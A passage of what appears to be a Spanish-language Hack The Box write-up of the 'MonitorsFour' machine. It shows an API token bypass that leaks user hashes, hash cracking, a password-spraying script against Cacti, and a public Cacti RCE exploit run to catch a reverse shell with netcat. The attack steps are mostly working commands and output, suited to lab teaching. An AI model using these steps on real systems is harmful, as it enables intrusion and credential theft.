<span class="o">[</span>Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 81ms<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nb">logout</span> <span class="o">[</span>Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 406ms<span class="o">]</span> </span></span><span class="line"><span class="cl">users <span class="o">[</span>Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 237ms<span class="o">]</span> </span></span><span class="line"><span class="cl">user <span class="o">[</span>Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 302ms<span class="o">]</span> </span></span><span class="line"><span class="cl">:: Progress: <span class="o">[</span>4614/4614<span class="o">]</span> :: Job <span class="o">[</span>1/1<span class="o">]</span> :: <span class="m">40</span> req/sec :: Duration: <span class="o">[</span>0:01:03<span class="o">]</span> :: Errors: <span class="m">0</span> :: </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p><code>/users</code> requiere de un token valido.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ curl <span class="s1">&#39;http://monitorsfour.htb/api/v1/users&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;error&#34;</span>:<span class="s2">&#34;Invalid or missing token&#34;</span><span class="o">}</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Al indicar el valor 0 este devuelve todos los usuarios con su informacion.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ curl -s <span class="s1">&#39;http://monitorsfour.htb/api/v1/users?token=0&#39;</span> <span class="p">|</span> jq </span></span><span class="line"><span class="cl"><span class="o">[</span> </span></span><span class="line"><span class="cl"> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;id&#34;</span>: 2, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;username&#34;</span>: <span class="s2">&#34;admin&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;email&#34;</span>: <span class="s2">&#34;admin@monitorsfour.htb&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;password&#34;</span>: <span class="s2">&#34;56b32eb43e6f15395f6c46c1c9e1cd36&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;role&#34;</span>: <span class="s2">&#34;super user&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;token&#34;</span>: <span class="s2">&#34;8024b78f83f102da4f&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span>: <span class="s2">&#34;Marcus Higgins&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;position&#34;</span>: <span class="s2">&#34;System Administrator&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;dob&#34;</span>: <span class="s2">&#34;1978-04-26&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;start_date&#34;</span>: <span class="s2">&#34;2021-01-12&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;salary&#34;</span>: <span class="s2">&#34;320800.00&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;id&#34;</span>: 5, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;username&#34;</span>: <span class="s2">&#34;mwatson&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;email&#34;</span>: <span class="s2">&#34;mwatson@monitorsfour.htb&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;password&#34;</span>: <span class="s2">&#34;69196959c16b26ef00b77d82cf6eb169&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;role&#34;</span>: <span class="s2">&#34;user&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;token&#34;</span>: <span class="s2">&#34;0e543210987654321&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span>: <span class="s2">&#34;Michael Watson&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;position&#34;</span>: <span class="s2">&#34;Website Administrator&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;dob&#34;</span>: <span class="s2">&#34;1985-02-15&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;start_date&#34;</span>: <span class="s2">&#34;2021-05-11&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;salary&#34;</span>: <span class="s2">&#34;75000.00&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;id&#34;</span>: 6, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;username&#34;</span>: <span class="s2">&#34;janderson&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;email&#34;</span>: <span class="s2">&#34;janderson@monitorsfour.htb&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;password&#34;</span>: <span class="s2">&#34;2a22dcf99190c322d974c8df5ba3256b&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;role&#34;</span>: <span class="s2">&#34;user&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;token&#34;</span>: <span class="s2">&#34;0e999999999999999&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span>: <span class="s2">&#34;Jennifer Anderson&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;position&#34;</span>: <span class="s2">&#34;Network Engineer&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;dob&#34;</span>: <span class="s2">&#34;1990-07-16&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;start_date&#34;</span>: <span class="s2">&#34;2021-06-20&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;salary&#34;</span>: <span class="s2">&#34;68000.00&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;id&#34;</span>: 7, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;username&#34;</span>: <span class="s2">&#34;dthompson&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;email&#34;</span>: <span class="s2">&#34;dthompson@monitorsfour.htb&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;password&#34;</span>: <span class="s2">&#34;8d4a7e7fd08555133e056d9aacb1e519&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;role&#34;</span>: <span class="s2">&#34;user&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;token&#34;</span>: <span class="s2">&#34;0e111111111111111&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;name&#34;</span>: <span class="s2">&#34;David Thompson&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;position&#34;</span>: <span class="s2">&#34;Database Manager&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;dob&#34;</span>: <span class="s2">&#34;1982-11-23&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;start_date&#34;</span>: <span class="s2">&#34;2022-09-15&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;salary&#34;</span>: <span class="s2">&#34;83000.00&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">]</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Creamos un wordlist con los usuarios.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ curl -s <span class="s2">&#34;http://monitorsfour.htb/user?token=0&#34;</span> <span class="p">|</span> jq <span class="s1">&#39;[.[] | .username]&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;admin&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mwatson&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;janderson&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;dthompson&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">]</span> </span></span><span class="line"><span class="cl">❯ </span></span><span class="line"><span class="cl">❯ python usernames.py names.txt &gt;&gt; users.txt </span></span><span class="line"><span class="cl">❯ wc -l users.txt </span></span><span class="line"><span class="cl"><span class="m">44</span> users.txt </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="crack-the-hash">Crack The Hash</h2> <p>Obtuvimos unicamente los hashes.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ curl -s <span class="s2">&#34;http://monitorsfour.htb/user?token=0&#34;</span> <span class="p">|</span> jq <span class="s1">&#39;[.[] | .password]&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;56b32eb43e6f15395f6c46c1c9e1cd36&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;69196959c16b26ef00b77d82cf6eb169&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;2a22dcf99190c322d974c8df5ba3256b&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;8d4a7e7fd08555133e056d9aacb1e519&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;9e8694e99216221dad8f6fd183904504&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">]</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p><a href="crackstation.net">crackstation</a> muestra el valor del hash del administrador.</p> <table> <thead> <tr> <th>Hash</th> <th>Type</th> <th>Result</th> </tr> </thead> <tbody> <tr> <td>56b32eb43e6f15395f6c46c1c9e1cd36</td> <td>md5</td> <td>wonderful1</td> </tr> <tr> <td>69196959c16b26ef00b77d82cf6eb169</td> <td>Unknown</td> <td>Not found</td> </tr> <tr> <td>2a22dcf99190c322d974c8df5ba3256b</td> <td>Unknown</td> <td>Not found</td> </tr> <tr> <td>8d4a7e7fd08555133e056d9aacb1e519</td> <td>Unknown</td> <td>Not found</td> </tr> </tbody> </table> <h2 id="admin">Admin</h2> <p>Las credenciales dan acceso al dashboard.</p> <p><img src="https://sckull.github.io/images/posts/htb/monitorsfour/2025_0612340070707.png" alt="image" /></p> <p>Vemos que es posible generar una token para la API.</p> <p><img src="https://sckull.github.io/images/posts/htb/monitorsfour/2025_0612340410941.png" alt="image" /></p> <p>Existe un historial donde se indican todos los cambios realizados en cada version. Se menciona una vulnerabilidad parcheada y, la version <code>Docker Desktop 4.44.2</code>.</p> <table> <thead> <tr> <th align="right">Version</th> <th>Date</th> <th>Title</th> <th>Change</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td align="right">V.1.9</td> <td>June 2, 2025</td> <td>API User Integration</td> <td>API</td> <td>Integrated API user management with token-based authentication, enabling external systems to automate tasks such as retrieving user data, managing resources, and interacting with the platform securely.</td> </tr> <tr> <td align="right">V.1.8</td> <td>June 1, 2025</td> <td>API Key Management</td> <td>API</td> <td>Implemented secure API key generation and updated the user interface to allow managing API keys. Users can now create keys for programmatic access while maintaining control through the admin dashboard.</td> </tr> <tr> <td align="right">V.1.7</td> <td>May 16, 2025</td> <td>Infrastructure Notice</td> <td>Infrastructure</td> <td>Migrated MonitorsFour infrastructure to Windows and Docker Desktop 4.44.2, enabling containerized deployments for improved portability, scalability, and easier environment management.</td> </tr> <tr> <td align="right">V.1.6</td> <td>May 1, 2025</td> <td>Security Notice: SQL Injection Patch</td> <td>Security</td> <td>Patched an error-based SQL injection vulnerability in the forgotten password form by enforcing secure prepared state stricter input validation.</td> </tr> <tr> <td align="right">V.1.5</td> <td>March 1, 2025</td> <td>User Enhancements</td> <td>Users</td> <td>Added functionality to allow Super Users to create, update, and delete user accounts directly from the user management interface.</td> </tr> <tr> <td align="right">V.1.4</td> <td>February 1, 2024</td> <td>User Management</td> <td>Users</td> <td>Created the users section to display all current users of the web app. Features include role management, user status monitoring, and detailed user activity logs.</td> </tr> <tr> <td align="right">V.1.3</td> <td>January 1, 2024</td> <td>Customer Management</td> <td>Customers</td> <td>Developed the customers section to handle all customer-related information. Features include the ability to add new customers, edit existing profiles, and remove customers from the database.</td> </tr> <tr> <td align="right">V.1.2</td> <td>December 1, 2023</td> <td>Invoice Tracking</td> <td>Invoices</td> <td>Introduced the ability to create and manage invoices. Included features for tracking payment status, due dates, and automatic reminders.</td> </tr> <tr> <td align="right">V.1.1</td> <td>November 1, 2023</td> <td>Order Management</td> <td>Tasks</td> <td>Added functionality to create, update, and monitor tasks related to customer orders. Enhanced the workflow with real-time updates and notifications.</td> </tr> <tr> <td align="right">V.1.0</td> <td>October 1, 2023</td> <td>Initial release</td> <td>Dashboard</td> <td>Initial setup of the dashboard for real-time monitoring and data visualization. Included basic traffic sources, sales statistics, and quick stats.</td> </tr> </tbody> </table> <h1 id="cacti">Cacti</h1> <p>El subdominio <code>cacti</code> muestra la version <code>1.2.28</code>. Encontramos que esta version es afectada por una vulnerabilidad: <a href="https://github.com/Cacti/cacti/security/advisories/GHSA-fxrq-fr7h-9rqq">CVE-2025-24367</a>. Permite la creacion de archivos para la ejecucion remota de comandos (RCE). Aunque para ello es necesario tener acceso a cacti.</p> <p><img src="https://sckull.github.io/images/posts/htb/monitorsfour/2025_0612340215321.png" alt="image" /></p> <h2 id="password-spraying">Password Spraying</h2> <p>Utilizamos un script en python para realizar Password Spraying con los usuarios conocidos hacia el login de cacti.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ cat cacti_login.py </span></span><span class="line"><span class="cl">import requests </span></span><span class="line"><span class="cl">from bs4 import BeautifulSoup </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">login_url</span> <span class="o">=</span> <span class="s2">&#34;http://cacti.monitorsfour.htb/cacti/index.php&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">proxies</span> <span class="o">=</span> <span class="o">{</span><span class="s1">&#39;http&#39;</span>:<span class="s1">&#39;http://127.0.0.1:8080&#39;</span><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">USER</span> <span class="o">=</span> <span class="s1">&#39;users.txt&#39;</span> </span></span><span class="line"><span class="cl"><span class="nv">PASSWORD</span> <span class="o">=</span> <span class="s1">&#39;wonderful1&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">with open<span class="o">(</span>USER, <span class="s2">&#34;r&#34;</span><span class="o">)</span> as f: </span></span><span class="line"><span class="cl"> <span class="k">for</span> user in f: </span></span><span class="line"><span class="cl"> <span class="nv">user</span> <span class="o">=</span> user.strip<span class="o">()</span> </span></span><span class="line"><span class="cl"> <span class="nv">session</span> <span class="o">=</span> requests.Session<span class="o">()</span> </span></span><span class="line"><span class="cl"> <span class="nv">get_page</span> <span class="o">=</span> session.get<span class="o">(</span>login_url<span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="nv">soup</span> <span class="o">=</span> BeautifulSoup<span class="o">(</span>get_page.text, <span class="s2">&#34;html.parser&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nv">csrf_token</span> <span class="o">=</span> soup.find<span class="o">(</span><span class="s2">&#34;input&#34;</span>, <span class="o">{</span><span class="s2">&#34;name&#34;</span>: <span class="s2">&#34;__csrf_magic&#34;</span><span class="o">})[</span><span class="s2">&#34;value&#34;</span><span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="nv">data</span> <span class="o">=</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;__csrf_magic&#34;</span>: csrf_token, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;action&#34;</span>: <span class="s2">&#34;login&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;login_username&#34;</span>: user, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;login_password&#34;</span>: PASSWORD </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="nv">post_response</span> <span class="o">=</span> session.post<span class="o">(</span>login_url, <span class="nv">data</span><span class="o">=</span>data, <span class="nv">proxies</span><span class="o">=</span>proxies<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="s1">&#39;Denied&#39;</span> not in post_response.text: </span></span><span class="line"><span class="cl"> print<span class="o">(</span>f<span class="s2">&#34;Login as: {user}:{PASSWORD}&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">break</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Se logro identificar un par de credenciales validas.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ python cacti_login.py </span></span><span class="line"><span class="cl">Login as: marcus:wonderful1 </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---www-data-docker">User - www-data (Docker)</h1> <h2 id="cve-2025-24367">CVE-2025-24367</h2> <p>Clonamos el repositorio <a href="https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC">CVE-2025-24367-Cacti-PoC</a> que aloja el exploit para la vulnerabilidad anterior mencionada.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git </span></span><span class="line"><span class="cl">Cloning into <span class="s1">&#39;CVE-2025-24367-Cacti-PoC&#39;</span>... </span></span><span class="line"><span class="cl">remote: Enumerating objects: 6, <span class="k">done</span>. </span></span><span class="line"><span class="cl">remote: Counting objects: 100% <span class="o">(</span>6/6<span class="o">)</span>, <span class="k">done</span>. </span></span><span class="line"><span class="cl">remote: Compressing objects: 100% <span class="o">(</span>5/5<span class="o">)</span>, <span class="k">done</span>. </span></span><span class="line"><span class="cl">remote: Total <span class="m">6</span> <span class="o">(</span>delta 0<span class="o">)</span>, reused <span class="m">0</span> <span class="o">(</span>delta 0<span class="o">)</span>, pack-reused <span class="m">0</span> <span class="o">(</span>from 0<span class="o">)</span> </span></span><span class="line"><span class="cl">Receiving objects: 100% <span class="o">(</span>6/6<span class="o">)</span>, 5.35 KiB <span class="p">|</span> 5.35 MiB/s, <span class="k">done</span>. </span></span><span class="line"><span class="cl">❯ <span class="nb">cd</span> CVE-2025-24367-Cacti-PoC </span></span><span class="line"><span class="cl">❯ ll </span></span><span class="line"><span class="cl">.rw-rw-r-- kali kali 8.3 KB Sat Dec <span class="m">6</span> 22:58:27 <span class="m">2025</span>  exploit.py </span></span><span class="line"><span class="cl">.rw-rw-r-- kali kali 1.6 KB Sat Dec <span class="m">6</span> 22:58:27 <span class="m">2025</span>  README.md </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>La flag <code>-h</code> indica los valores necesarios para la explotacion.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ python exploit.py -h </span></span><span class="line"><span class="cl">usage: CVE-2025-24367 - Cacti Authenticated Graph Template RCE <span class="o">[</span>-h<span class="o">]</span> -u USER -p PASSWORD -i IP -l PORT -url URL <span class="o">[</span>--proxy<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">options: </span></span><span class="line"><span class="cl"> -h, --help show this <span class="nb">help</span> message and <span class="nb">exit</span> </span></span><span class="line"><span class="cl"> -u, --user USER Username <span class="k">for</span> login </span></span><span class="line"><span class="cl"> -p, --password PASSWORD </span></span><span class="line"><span class="cl"> Password <span class="k">for</span> login </span></span><span class="line"><span class="cl"> -i, --ip IP IP address <span class="k">for</span> reverse shell </span></span><span class="line"><span class="cl"> -l, --port PORT Port number <span class="k">for</span> reverse shell </span></span><span class="line"><span class="cl"> -url, --url URL Base URL of the application </span></span><span class="line"><span class="cl"> --proxy Enable proxy usage <span class="o">(</span>default: http://127.0.0.1:8080<span class="o">)</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Se ejecuto el exploit indicando nuestra IP y puerto a la escucha para una shell inversa.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ python exploit.py -url http://cacti.monitorsfour.htb -u marcus -p wonderful1 -i 10.10.14.26 -l <span class="m">1335</span> --proxy </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Cacti Instance Found! </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Serving HTTP on port <span class="m">80</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Login Successful! </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Got graph ID: <span class="m">226</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Created PHP filename: Xp3i2.php </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Got payload: /bash </span></span><span class="line"><span class="cl"><span class="o">[</span>i<span class="o">]</span> Created PHP filename: ZgsJh.php </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Hit timeout, looks good <span class="k">for</span> shell, check your listener! </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Stopped HTTP server on port <span class="m">80</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="shell">Shell</h2> <p>Con ello obtuvimos una shell como www-data.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ rlwrap nc -lvp <span class="m">1335</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1335</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.26<span class="o">]</span> from monitorsfour.htb <span class="o">[</span>10.129.45.249<span class="o">]</span> <span class="m">61427</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>9<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/html/cacti$ whoami<span class="p">;</span>id<span class="p">;</span><span class="nb">pwd</span> </span></span><span class="line"><span class="cl">www-data </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> </span></span><span class="line"><span class="cl">/var/www/html/cacti </span></span><span class="line"><span class="cl">www-data@821fbd6a43fa:~/html/cacti$ </span></span></code></pre></td></tr></table> </div> </div><p>En <code>config.php</code> se definen las variables para la conexion de base de datos de cacti.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span 